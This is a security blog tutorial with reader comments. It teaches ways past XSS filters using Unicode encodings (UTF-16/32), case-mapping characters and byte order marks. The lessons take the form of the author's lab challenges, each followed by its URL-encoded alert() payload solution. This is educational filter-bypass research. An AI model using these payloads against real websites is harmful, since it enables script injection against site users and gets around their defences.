Xssing Web With Unicodes
Hello friends,
This is the second part of "Xssing Web". In this post I would show how to abuse unicodes to bypass XSS filters.
BTW if you want to check previous part click here.
Note : If you think there are any mistakes in this post then kindly mention it in comments.
I have developed several XSS challenges to show how unicodes can be used to bypass filters. If you want to try those challenges first then click here, get back here if you couldn't solve any.
Abusing Unicode :
So what is Unicode?
-> Unicode is nothing but the encoding standard. It defines UTF-8, UTF-16,UTF-32, etc encodings.
1) UTF-8 :
Characters Size : 1 byte to 4 byte
Example :
Character "A" => 0x41
Character "¡" => 0xC2 0xA1
Character "ಓ" => 0xE0 0xB2 0x93
Character "𪨶" => 0xF0 0xAA 0xA8 0xB6
2) UTF-16 :
Character Size : 2 byte
However in UTF-16 there are two ways to represent any characters.
i) UTF-16be (be- Big Endian) [Left to Right Byte Order ]
Example :
Character "A" => 0x00 0x41
ii) UTF-16le (le- Little Endian) [Right to Left Byte Order]
Example :
Character "A" => 0x41 0x00
3) UTF-32 :
Character Size : 4 byte
In UTF-32 also there are two ways to represent any character.
i) UTF-32be (be- Big Endian) [Left to Right Byte Order]
Example :
Character "A" => 0x00 0x00 0x00 0x41
ii) UTF-32le (le- Little Endian) [Right to Left Byte Order]
Example :
Character "A" => 0x41 0x00 0x00 0x00
Alright. Enough unicode theory.
Let's see some XSS filters that you can bypass using unicode.
Challenge 1 :
http://rakeshmane.com/lab/unicode/xss.php?x=payload&charset=utf-8
How would you bypass it?
Think.
Hint : You can control the charset of html response.
No luck?
It's simple, you just have to use UTF-16 encoding to bypass the filter.
Solution :
http://rakeshmane.com/lab/unicode/xss.php?x=%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00&charset=utf-16be
Alright now let's consider "UTF-16" string is filtered.
Challenge 2 :
http://rakeshmane.com/lab/unicode/xss1.php?x=payload&charset=utf-8
Now how would you bypass it?
Hint : You can control the charset of html response.
No luck?
It's also very simple, you can simply use UTF-32 encoding to bypass the filter.
Solution :
http://rakeshmane.com/lab/unicode/xss1.php?charset=UTF-32&x=%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
BTW did you noticed I added two extra null bytes at the beginning of our payload?
%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
Abusing Unicode Case Mappings :
Now let's move towards unicode case mappings.
Lets see if there are any unicode characters which when mapped to upper or lower case transform to english alphabet letters.
I wrote a small JS code to obtain these characters. [You can get the code here]
We can use this unicode characters to bypass some of XSS filters.
Challenge 3 :
http://rakeshmane.com/lab/unicode/xss2.php?x=payload
Could you solve it?
Hint : Check above image
Let's try to solve it , as you can see in above image we have a unicode character Å¿ [\u017f] which when mapped to Upper Case turns into capital letter "S".
Our payload : <Å¿cript/src=./1></script>
Solution : http://rakeshmane.com/lab/unicode/xss2.php?x=<%C5%BFcript/src=./1></script>
Now let's make it little harder.
Challenge 4 :
http://rakeshmane.com/lab/unicode/xss3.php?x=payload
Could you XSS now?
No? Ah. It's also very simple.
Let's check above image again. You see there's a unicode character ı [\u0131] which when mapped to Upper Case turns into capital letter "I".
Our payload : <scrıpt/src=./1></script>
Solution : http://rakeshmane.com/lab/unicode/xss3.php?x=<scr%C4%B1pt/src=./1></script>
Now let's try another challenge.
Challenge 5 :
http://rakeshmane.com/lab/unicode/xss4.php?x=payload
Try to solve it.
No luck? Get back to above image again. See unicode character K [\u212a] when mapped to Lower Case transforms to letter "k".
Our payload : x oncliK=aler$t()
Tool to convert unicode code points to UTF-8 bytes :
http://www.ltg.ed.ac.uk/~richard/utf-8.cgi?input=0131&mode=hex
Abusing BOM - Byte Order Mark :
What is BOM ?
For the 16- and 32-bit representations, a computer receiving text from arbitrary sources needs to know which byte order the integers are encoded in. Because the BOM itself is encoded in the same scheme as the rest of the document, but has a known value, the consumer of the text can examine these first few bytes to determine the encoding.
- Wikipedia
Note : The page must begin with the BOM character.
- BOM Character :
For UTF-16 Encoding:
Big Endian : 0xFE 0xFF
Little Endian : 0xFF 0xFE
For UTF-32 Encoding:
Big Endian : 0x00 0x00 0xFE 0xFF
Little Endian : 0xFF 0xFE 0x00 0x00
Challenge 6 :
http://rakeshmane.com/lab/unicode/xss5.php?q=payload
This is going to be hard one.
Couldn't solve it?
Hint : BOM
Still no luck?
Let me tell you one interesting thing about BOM character, it allows you to override charset of the page. The only requirement is that page should begin with this character.
So to override page encoding with UTF-16be you can use BOM character 0xFE 0xFF , for UTF-32be you can use 0x00 0x00 0xFE 0xFF.
UTF-16BE Solution:
http://rakeshmane.com/lab/unicode/xss5.php?q=%fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E
http://rakeshmane.com/lab/unicode/xss5.php?q=%00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
That's enough for today :)
References :
https://www.w3.org/International/questions/qa-byte-order-mark
https://en.wikipedia.org/wiki/Byte_order_mark
http://www.fileformat.info/info/unicode/utf8.htm
http://www.fileformat.info/info/charset/UTF-16/list.htm
https://github.com/numirias/ctf/blob/master/writeup-google-ctf-2017-geokitties-v2.md
https://stackoverflow.com/questions/4655250/difference-between-utf-8-and-utf-16
https://stackoverflow.com/questions/496321/utf-8-utf-16-and-utf-32
But how common is it to be able to change the charset with a query param?
ReplyDeletenot common at all
DeleteLeet ;_;
ReplyDelete\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
ReplyDeletefrom where u got this? I could not find anywhere equivalent to this
Gold Gold Post <3
ReplyDelete